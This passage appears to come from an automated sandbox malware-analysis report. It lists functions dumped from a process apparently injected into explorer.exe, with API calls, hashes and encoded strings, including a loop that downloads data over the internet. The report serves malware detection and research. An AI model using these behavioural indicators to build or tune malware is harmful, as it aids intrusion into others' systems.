                                                  • __dosmaperr.LIBCMT ref: 03243D7F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                  • String ID: H
                                                  • API String ID: 4237864984-2852464175
                                                  • Opcode ID: 1e53d0894eb520235b4191646b1dded25ddbe32d0c6fd268d1db691a91656526
                                                  • Instruction ID: c71a78e203aec6a708703fd9db82eccf23fda65b6e84aaabaf3acf4513033409
                                                  • Opcode Fuzzy Hash: 1e53d0894eb520235b4191646b1dded25ddbe32d0c6fd268d1db691a91656526
                                                  • Instruction Fuzzy Hash: 5BA1793AA242558FCF1DEF78D8457AD3BA1AF06320F184159E911EF3D0CB7499A2CB51
                                                  Function 0322CD22 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 0322CE1F
                                                  • type_info::operator==.LIBVCRUNTIME ref: 0322CE41
                                                  • ___TypeMatch.LIBVCRUNTIME ref: 0322CF50
                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 0322D022
                                                  • _UnwindNestedFrames.LIBCMT ref: 0322D0A6
                                                  • CallUnexpected.LIBVCRUNTIME ref: 0322D0C1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 2123188842-393685449
                                                  • Opcode ID: 037829c7cc496f3877418b2b19c26731f2c9e394dd6ef28a3f9f5387a5c41a0d
                                                  • Instruction ID: 519a6fcb91c7298e7fdee6540afa7f78648a9330d55364b26964cfe60ab69267
                                                  • Opcode Fuzzy Hash: 037829c7cc496f3877418b2b19c26731f2c9e394dd6ef28a3f9f5387a5c41a0d
                                                  • Instruction Fuzzy Hash: BDB17D7582023AFFCF25DF94CC409AEBFB5BF44310B18409AE8256B225D775DA91CB91
                                                  Function 03236CB8 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 03236CCE
                                                    • Part of subcall function 032381B6: HeapFree.KERNEL32(00000000,00000000,?,0324115C,?,00000000,?,8B18EC83,?,032413FF,?,00000007,?,?,032418A4,?), ref: 032381CC
                                                    • Part of subcall function 032381B6: GetLastError.KERNEL32(?,?,0324115C,?,00000000,?,8B18EC83,?,032413FF,?,00000007,?,?,032418A4,?,?), ref: 032381DE
                                                  • _free.LIBCMT ref: 03236CDA
                                                  • _free.LIBCMT ref: 03236CE5
                                                  • _free.LIBCMT ref: 03236CF0
                                                  • _free.LIBCMT ref: 03236CFB
                                                  • _free.LIBCMT ref: 03236D06
                                                  • _free.LIBCMT ref: 03236D11
                                                  • _free.LIBCMT ref: 03236D1C
                                                  • _free.LIBCMT ref: 03236D27
                                                  • _free.LIBCMT ref: 03236D35
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 008ffed6dcb53895d9c761974c0b030ba15e4aef1553912e19b0888429b7148f
                                                  • Instruction ID: fb10f787b906b68f8bc6cc3e40706b85bc907842e2e4104a1f53ab7ce5f46ad8
                                                  • Opcode Fuzzy Hash: 008ffed6dcb53895d9c761974c0b030ba15e4aef1553912e19b0888429b7148f
                                                  • Instruction Fuzzy Hash: 32219DBA920208BFCF42EF98C980DDD7BB9AF19640F004155F655AF220EB71D684CB80
                                                  Function 0321CA08 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 236networksleepfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InternetOpenA.WININET(0325CE7B,00000000,00000000,00000000,00000000), ref: 0321CAAF
                                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0321CACC
                                                  • InternetReadFile.WININET(00000000,?,03E80000,03E80000), ref: 0321CAE0
                                                  • InternetCloseHandle.WININET(00000000), ref: 0321CAEB
                                                  • InternetCloseHandle.WININET(?), ref: 0321CAF0
                                                  • Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 0321CB49
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: Internet$CloseHandleOpen$FileReadSleep
                                                  • String ID: 246122658369$ZJF=
                                                  • API String ID: 2890883735-1835274619
                                                  • Opcode ID: 925e25a123bee11c36028c95984e49218591a418a539925a58a8f5f3deea4fba
                                                  • Instruction ID: 46f261d1d409080c4e3dbdd6b3c9e3e22f10b8a63f5306a1d976e0b8dcbd395f
                                                  • Opcode Fuzzy Hash: 925e25a123bee11c36028c95984e49218591a418a539925a58a8f5f3deea4fba
                                                  • Instruction Fuzzy Hash: 73813A75A60358ABEF18DF78CD45B9DBFB5EF45300F248208E405AB2C1DB759AD08B91
                                                  Function 0321C6A0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 220COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 246122658369$ZtF=$axS5 ykoPx==
                                                  • API String ID: 0-949366062
                                                  • Opcode ID: 8d3fb7fe33a1863522d0a86c0c7f3d958d62ffff295bf5211485c73bd0e70b96
                                                  • Instruction ID: 8d67deeff5984c2c0e3b74679f6ba0ea5abb773ecf144c8660f9f47f0cfbfba7
                                                  • Opcode Fuzzy Hash: 8d3fb7fe33a1863522d0a86c0c7f3d958d62ffff295bf5211485c73bd0e70b96
                                                  • Instruction Fuzzy Hash: 7A81C174A10359EFEF14EFA8CD49BAEBFB5EF04704F144148E9016B281D7B55A84CB91
                                                  Function 03240F24 Relevance: 13.7, APIs: 9, Instructions: 199COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: ef6eeb19a44b64aec56479ece0c7906a81e86da24be2c5c37723f4e1695b659d
                                                  • Instruction ID: 8fb7d8ba6c7a3f34652fed5ce8b067630a55e9e1d03761a5e03700e0177274d9
                                                  • Opcode Fuzzy Hash: ef6eeb19a44b64aec56479ece0c7906a81e86da24be2c5c37723f4e1695b659d
                                                  • Instruction Fuzzy Hash: 57610975924341AFDB24DF75C840BAAB7F8EF45710F144559E995EF280EBB0A9C0CB50
                                                  Function 03228D83 Relevance: 13.6, APIs: 9, Instructions: 139threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
                                                  • String ID:
                                                  • API String ID: 3943753294-0
                                                  • Opcode ID: 00f13c5733d6ebecb3bc0632f51e70adb8c88f17850175a68b5c224369b18841
                                                  • Instruction ID: 7fe5bfe05ad505da6fbed48f8ded012b3d3dc06f6b2d523d34092474e6bc18dc
                                                  • Opcode Fuzzy Hash: 00f13c5733d6ebecb3bc0632f51e70adb8c88f17850175a68b5c224369b18841
                                                  • Instruction Fuzzy Hash: BD517335920226EFCF10DF64D98456DBFF9EF04710B288499E806AB295D770FD80CB95
                                                  Function 03222770 Relevance: 12.3, APIs: 8, Instructions: 343COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_$Cnd_broadcast
                                                  • String ID:
                                                  • API String ID: 3990724213-0
                                                  • Opcode ID: 83ea965a85d5ca1402e67bcd2d2495a961edb056fb81335d9ecabfe83dc04a43
                                                  • Instruction ID: c77b6172bad1f910a9e744174b7d37676cfdb5c421bc4080a3e5716387126757
                                                  • Opcode Fuzzy Hash: 83ea965a85d5ca1402e67bcd2d2495a961edb056fb81335d9ecabfe83dc04a43
                                                  • Instruction Fuzzy Hash: 7BB10475D1032AEFCB21DF64CC44BAEBFB4AF05310F044A69E8169B651DB72E584CBA1
                                                  Function 0321AD80 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 271COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0320A470: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,74D40A26,00000000,?), ref: 0320A4BA
                                                  • GetFileAttributesA.KERNEL32(?,?,00000000,00000000,03267494,0000000E,74D40A26,00000000,00000000), ref: 0321AE2D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: AttributesFileFolderPath
                                                  • String ID: .$246122658369$Xq==$ZJF=$ZNiq
                                                  • API String ID: 1512852658-2334461054
                                                  • Opcode ID: 9af67f69edbd9bf7485204c8ddb463684635ca06c819352337f7c5d731b4f962
                                                  • Instruction ID: dc6f0aaee90e17b4a5bdfbd87be09fbff33c99e3265ad211ff3e2d6897582a29
                                                  • Opcode Fuzzy Hash: 9af67f69edbd9bf7485204c8ddb463684635ca06c819352337f7c5d731b4f962
                                                  • Instruction Fuzzy Hash: 41C17C74D10398DFEF14EBA8C948BDDBFB5AF15304F648088D4446B282D7B55AC8DBA2
                                                  Function 03212330 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 169COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: list too long
                                                  • API String ID: 0-1124181908
                                                  • Opcode ID: 85f7d6fc827aea8f8eb6c77fdde76797d14228788532f6542781fb246c976de4
                                                  • Instruction ID: 4ae5e53efc376628f51938c54bb988615a1973959e0e8c5dec2e8ea1f74c715c
                                                  • Opcode Fuzzy Hash: 85f7d6fc827aea8f8eb6c77fdde76797d14228788532f6542781fb246c976de4
                                                  • Instruction Fuzzy Hash: E85193B5D14719AFDB10DF64DD49B9AF7B4EF08310F0481A9E8189B281DB70AAD1CF51
                                                  Function 0322C7F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _ValidateLocalCookies.LIBCMT ref: 0322C827
                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0322C82F
                                                  • _ValidateLocalCookies.LIBCMT ref: 0322C8B8
                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0322C8E3
                                                  • _ValidateLocalCookies.LIBCMT ref: 0322C938
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 1170836740-1018135373
                                                  • Opcode ID: 42c5cf3255a47c17bd0d0910bd62e62bf2a38c47677033ab64ffa32db829f7c9
                                                  • Instruction ID: 2bc17ff95d82ad4f382d24ebd323839e8178261821013a2424211848255d2a2f
                                                  • Opcode Fuzzy Hash: 42c5cf3255a47c17bd0d0910bd62e62bf2a38c47677033ab64ffa32db829f7c9
                                                  • Instruction Fuzzy Hash: 5F41B134A20229AFCF14DF69DC84A9EBFA5AF44224F18C155EC249B351D771AA81CB91
                                                  Function 03238685 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: api-ms-$ext-ms-
                                                  • API String ID: 0-537541572
                                                  • Opcode ID: 03ef97f7c3919c0bca3bc6e0b60f06696ed3d3cd7d020a00bf675df80e1ee1c9
                                                  • Instruction ID: a7f69ee9539298e76c9643002eecb67939a5c981bd50c6cda84c539bb0b6e8fd
                                                  • Opcode Fuzzy Hash: 03ef97f7c3919c0bca3bc6e0b60f06696ed3d3cd7d020a00bf675df80e1ee1c9
                                                  • Instruction Fuzzy Hash: EA21EBF9A61332BBCF21DA349C84B1A77699F036A0F190150FD16EF184D7B0ED8586E1
                                                  Function 032413E6 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 03241132: _free.LIBCMT ref: 03241157
                                                  • _free.LIBCMT ref: 03241434
                                                    • Part of subcall function 032381B6: HeapFree.KERNEL32(00000000,00000000,?,0324115C,?,00000000,?,8B18EC83,?,032413FF,?,00000007,?,?,032418A4,?), ref: 032381CC
                                                    • Part of subcall function 032381B6: GetLastError.KERNEL32(?,?,0324115C,?,00000000,?,8B18EC83,?,032413FF,?,00000007,?,?,032418A4,?,?), ref: 032381DE
                                                  • _free.LIBCMT ref: 0324143F
                                                  • _free.LIBCMT ref: 0324144A
                                                  • _free.LIBCMT ref: 0324149E
                                                  • _free.LIBCMT ref: 032414A9
                                                  • _free.LIBCMT ref: 032414B4
                                                  • _free.LIBCMT ref: 032414BF
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 8e077332dbe01b7341d50a84b951b88c6f42d95a84fc469bf2f7f0e4c6a3109e
                                                  • Instruction ID: e0f7dd38894dedc0162364ffcc1258d7f9b5e7efbef6f2d0d31203a55216b732
                                                  • Opcode Fuzzy Hash: 8e077332dbe01b7341d50a84b951b88c6f42d95a84fc469bf2f7f0e4c6a3109e
                                                  • Instruction Fuzzy Hash: 98117F759A1B08AAED31FBB0CC05FCBB7AD5F01B00F404C14B29E6E051DBE4B5D58650
                                                  Function 0323776F Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 032377B7
                                                  • __fassign.LIBCMT ref: 0323799C
                                                  • __fassign.LIBCMT ref: 032379B9
                                                  • WriteFile.KERNEL32(?,8B18EC83,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 03237A01
                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 03237A41
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 03237AE9
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 1735259414-0
                                                  • Opcode ID: 38314eac3f441f56d33dc27d2d2b88a4f2905b282995a70f07a848b8a5bc2c93
                                                  • Instruction ID: 4b987556434919acb599d950599c81ab83661281c3c0368c8ddd000ac5087357
                                                  • Opcode Fuzzy Hash: 38314eac3f441f56d33dc27d2d2b88a4f2905b282995a70f07a848b8a5bc2c93
                                                  • Instruction Fuzzy Hash: 92C19FB5D102599FCF14CFACD8809EDFBB9EF09314F28816AE855BB341D6719A82CB50
                                                  Function 032297D6 Relevance: 9.2, APIs: 6, Instructions: 175COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0322981F
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0322988A
                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 032298A7
                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 032298E6
                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 03229945
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 03229968
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiStringWide
                                                  • String ID:
                                                  • API String ID: 2829165498-0
                                                  • Opcode ID: 50d042d491eb8fba6dee41000ec815edd776652758d956fc9ce2df9c0f1f3922
                                                  • Instruction ID: 5502ae60b1493539d0bd1ed67c7266a127ea3f0b5d9c352e7a75dfad39f7d8b8
                                                  • Opcode Fuzzy Hash: 50d042d491eb8fba6dee41000ec815edd776652758d956fc9ce2df9c0f1f3922
                                                  • Instruction Fuzzy Hash: 3051CE76920226BBDF20DF62DC44FAABFA9EF44760F184529FD05EA150DB7189E0CB50
                                                  Function 03224780 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 032247B5
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 032247D7
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 032247F7
                                                  • __Getctype.LIBCPMT ref: 0322488D
                                                  • std::_Facet_Register.LIBCPMT ref: 032248AC
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 032248C4
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                  • String ID:
                                                  • API String ID: 1102183713-0
                                                  • Opcode ID: ba1e5caf4e925d373b7c89a521f4f8ed2fc0376f1598d48e01317e5428b38096
